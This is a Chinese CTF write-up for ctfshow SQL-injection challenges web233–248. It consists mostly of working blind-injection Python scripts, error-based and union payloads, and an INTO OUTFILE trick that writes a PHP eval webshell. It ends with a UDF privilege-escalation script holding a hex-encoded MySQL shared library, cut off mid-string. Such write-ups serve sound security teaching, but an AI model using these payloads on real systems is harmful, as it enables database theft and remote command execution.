# -*- encoding: utf-8 -*-
"""
@File    :   SQL布尔盲注.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/27 21:10   natro92      1.0         None
"""
import string
import requests
import time
import random


url = r'http://9a69458e-791c-4ebd-abe9-45cc89eaf042.challenge.ctf.show/api/'
flag_pre = 'ctfshow{'
str1 = "abcdefghijklmnopqrstuvwxyz0123456789{<>$=,;_ -}"
# payload = "ctfshow'and+if(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)=('{}'),1,0)#"
# payload = "ctfshow'and+if(mid((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1)=('{}'),1,0)#"
payload = "ctfshow'and+if(mid((select flagass233 from flag233333),{},1)=('{}'),1,0)#"
res = ''

for i in range(1,100):
    for j in str1:
        data = {
            'username': payload.format(i, j),
            'password': str(random.random())
        }
        r = requests.post(url, data=data)
        # print(data)
        # print(r.json()['msg'])
        if r'成功' in r.json()['msg']:
            res += j
            print(res)
            break
        if j == '}':
            exit()

web234

单引号被过滤了,这里用了一个\来逃逸。
就比如原语句是:

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

插入之后的语句是:

$sql = "update ctfshow_user set pass = '\' where username = 'username';";

然后pass张的内容就是' where username =
可能这么讲会听不太懂,就是将'当作转义的’ 然后和后面的单引号闭合:
update ctfshow_user set pass = '\' where username = 'username';
也就变为了:
update ctfshow_user set pass = '' where username = 'username'
测试payload:

password=\&username=,username=(select group_concat(table_name) from information_schema.columns where table_schema=database())--+
  banlist,ctfshow_user,ctfshow_user,flag23a

这里过滤掉了单引号,但是不闭合就查询不到,那就用十六进制来代替一下:

password=\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)--+
  id,flagass23s3,info
password=\&username=,username=(select flagass23s3 from flag23a)--+
  ctfshow{a4682f2f-3c53-464d-8733-7d88487cb1f5}

web235

https://www.jb51.net/article/134678.htm mysql统计信息
https://zhuanlan.zhihu.com/p/98206699 无列名注入

过滤了or ‘ information表的替代方法

这里不只是or关键字不能用,连带着information也不能用了,因此也就需要用你别的查询方法了。
mysql.innodb_table_stats
比如:

password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())--+
  banlist,ctfshow_user,flag23a1
select b from (select 1,2 as b,3 union select * from flag23a1 limit 1,1)a
  ctfshow{9970dea2-cadb-42d7-8c3b-a54b2ea469d1}

或者用:

username=,username=(select `2` from(select 1,2,3 union select * from flag23a1 limit 1,1)a)-- - &password=\
ctfshow{9970dea2-cadb-42d7-8c3b-a54b2ea469d1}

无列名这种特殊注入都可以。

web236

还过滤掉了flag这次 但没啥用 绕过flag的策略有很多。

password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())--+
banlist,ctfshow_user,flaga
password=\&username=,username=(select to_base64(b) from (select 1,2 as b,3 union select * from flaga limit 1,1)a)--+
Y3Rmc2hvd3tkOTQyOTcxNC00MTA2LTRkMjItYjg0YS01ODFiOTIzOWI2MGJ9
ctfshow{d9429714-4106-4d22-b84a-581b9239b60b}

web237

insert

记得抓包,不是原来的那个api接口了,而是:/api/insert.php
其余的都相同。

username=7',(select group_concat(table_name) from information_schema.tables where table_schema=database()));--+&password=2
banlist,ctfshow_user,flag
username=7',(select group_concat(column_name) from information_schema.columns where table_name='flag'));--+&password=2	
id,flagass23s3,info
username=6',(select flagass23s3 from flag));--+&password=2
ctfshow{5efc59c3-4a93-4d07-a546-5a702b6c57c1}

web238

insert 过滤空格

username=3',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#&password=1
banlist,ctfshow_user,flagb
username=3',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')));#&password=1
id,flag,info
username=3',(select(flag)from(flagb)));#&password=1
ctfshow{be8f3e4a-b6a0-4747-80d3-91979ef33988}

web239

过滤空格 or

相同操作,只不过更换查询的表:

username=3',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())));#&password=1
banlist,ctfshow_user,flagbb

这玩应把*过滤了,只能猜flag名,看了一下网上的做法基本如此。

username=1',(select`flag`from`flagbb`));#&password=1
ctfshow{0e1b5153-fff7-48be-aca1-cef950d964a0}

web240

Hint: 表名共9位,flag开头,后五位由a/b组成,如flagabaab,全小写
意思就是让我们爆破呗。

import requests

url = "http://a2483863-8c01-4755-a5b3-decf561e6728.challenge.ctf.show/api/insert.php"
name = "flag"
res = ''
for a in 'ab':
    for b in 'ab':
        for c in 'ab':
            for d in 'ab':
                for e in 'ab':
                    res = name + a + b + c + d + e
                    data = {
                        'username': f"{res}',(select(flag)from({res})))#",
                        'password': 'a'
                    }
                    print(data)
                    r = requests.post(url, data=data)

跑完一遍之后刷新一下:
image.png

web241

delete

遇事不决直接上盲注:
目标位置api/delete.php
先决定一下测试payload,直接在id中传入:

if(substr((database())),1,1)='c',sleep(0.05),0)

这时间盲注不同设备的时间不同,根据自己调整

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注1.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/28 20:21   natro92      1.0        web241
"""
import time

import requests
from tqdm import trange

url = r'http://b2100936-f04f-42cf-a179-f6bb35e08972.challenge.ctf.show/api/delete.php'
flag_pre = 'ctfshow{'
str = "_abcdefghijklmnopqrstuvwxyz0123456789{-,} "
# inside = 'database()'
# inside = 'select group_concat(table_name) from information_schema.tables where table_schema = database()'
# inside = 'select group_concat(column_name) from information_schema.columns where table_name = "flag"'
inside = 'substr((select group_concat(flag) from flag),9,36)'

payload = "if(substr(({}),{},1)='{}',sleep(0.05),0)"
res = ''
last = ' '

for i in trange(1, 37):
    for j in str:
        data = {
            'id': payload.format(inside, i, j),
        }
        try:
            # print(data)
            r = requests.post(url, data=data, timeout=1)
        except Exception as e:
            last = res
            res += j
            # print(res)
            break
        if last == res.replace(' ',''):
            exit()
        time.sleep(1)
    print(res)

网络的好坏决定着你在这个途中是否会出现错误。尽量减少位数的盲注,知道的前缀就别注了。

web242

file

select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';

字段分隔符

FIELDS TERMINATED BY‘,‘字段间分割符
OPTIONALLY ENCLOSED BY‘"‘将字段包围 对数值型无效

相关参考:

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]
 
export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

/***********************************************************/

“OPTION”参数为可选参数选项,其可能的取值有:
 
`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。
 
`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。
 
`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。
 
`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。
 
`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。
 
`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。

比如:

select * from user into outfile "位置" fileds terminated by '写入内容'

当然换行符也可以使用。

//备份表
$sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

我们直接使用测试木马接口位置/api/dump.php

filename=1.php' fields terminated by '<?php eval($_REQUEST[1]);?>'#

然后访问/dump/1.php
get或post传参:

1=system('cat /flag.here');

web243

sql加文件上传图片马

0xa6175746f5f70726570656e645f66696c653d312e6a7067
==> 
\nauto_prepend_file=1.jpg

首先先传入:

filename=1.jpg' LINES TERMINATED BY 0xa6175746f5f70726570656e645f66696c653d312e6a7067

再传入.user.ini

filename=.user.ini' LINES TERMINATED BY 0x0A6175746F5F70726570656E645F66696C653D67796C712E6A70670A#
其中0x0A6175746F5F70726570656E645F66696C653D67796C712E6A70670A是<?php eval($_REQUEST[1]);?>

然后访问:dump/index.php
传入命令即可。1=system('cat /flag.here');

web244

报错注入 updatexml

//备份表
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
//无过滤

用updatexml报错注入

/api/?id=' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+
banlist,ctfshow_flag,ctfshow_use
/?id=' or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag')),1) -- A
id,flag,info
flag太长需要查两遍:
api/?id=' or updatexml(1,concat(1,(select mid(flag,1,30) from ctfshow_flag)),1) --+
api/?id=' or updatexml(1,concat(1,(select mid(flag,20,30) from ctfshow_flag)),1) --+

然后拼起来:
ctfshow{99150aa0-0cf6-4537-ad52-3043e2647334}

web245

extractvalue()

用法类似,这里不多赘述了

api/?id=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)); --+
banlist,ctfshow_flagsa,ctfshow_
api/?id=1' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),0x7e)); --+
id,flag1,info
api/?id=1' or extractvalue(1,concat(0x7e,(select right(flag1,45) from ctfshow_flagsa),0x7e)); --+
ctfshow{1eaee386-fce7-49d8-86fd
api/?id=1' or extractvalue(1,concat(0x7e,(select right(flag1,30) from ctfshow_flagsa),0x7e)); --+
6-fce7-49d8-86fd-15c29674ed78}

ctfshow{1eaee386-fce7-49d8-86fd-15c29674ed78}

web246

https://www.cnblogs.com/wzy-ustc/p/14217750.html
https://www.cnblogs.com/laoxiajiadeyun/p/10283251.html

floor双查询

//查表名
/?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand()*2))a from information_schema.tables group by a-- A
//查列名
/?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name='ctfshow_flags' limit 1,1),0x7e,floor(rand()*2))a from information_schema.tables group by a-- A
//查数据
/?id=1' union select 1,count(*),concat((select flag2 from ctfshow_flags),0x7e,floor(rand()*2))a from information_schema.tables group by a-- A

需要二次上传才会出现结果

web247

ceil代替floor

$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";

使用ceil()(向上取整)代替floor()。当然也可以使用round():
ROUND(X) – 表示将值 X 四舍五入为整数,无小数位
ROUND(X,D) – 表示将值 X 四舍五入为小数点后 D 位的数值,D为小数点后小数位数。若要保留 X 值小数点左边的 D 位,可将 D 设为负值。
最后的payload是:

/?id=1' union select 1,count(*),concat((select `flag?` from ctfshow_flagsa),0x7e,ceil(rand()*2))a from information_schema.tables group by a-- A

可以看到这个字段名flag?加了反引号,原因是:
表名和字段名都可以用反引号引起来,这是用来区分MYSQL的保留字与普通字符。 表名、字段名、数据库名等可用反引号 ( ` ),也可以不使用反引号 ,但如果它包含特殊字符或保留字,则必须使用,如果不使用就会报错。
image.png

web248

UDF

https://lazzzaro.github.io/2020/05/16/web-SQL%E6%B3%A8%E5%85%A5/
https://www.k0rz3n.com/2018/10/21/Mysql%20%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%88%A9%E7%94%A8/#%E4%B8%89%E3%80%81MYSQL-UDF-%E6%8F%90%E6%9D%83
https://www.sqlsec.com/tools/udf.html
https://blog.csdn.net/qq_35938621/article/details/119846053 这里讲了详细步骤 建议看看

UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。当我们有读取和写入权限以后,我们就可以尝试使用UDF提权的方法,从数据库的root权限提升到系统的管理员权限。

#参考脚本
#环境:Linux/MariaDB
import requests
 
url='http://89a7098e-03f5-47f3-9cb5-1f1cd3d640e9.challenge.ctf.show:8080/api/?id='
code='7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4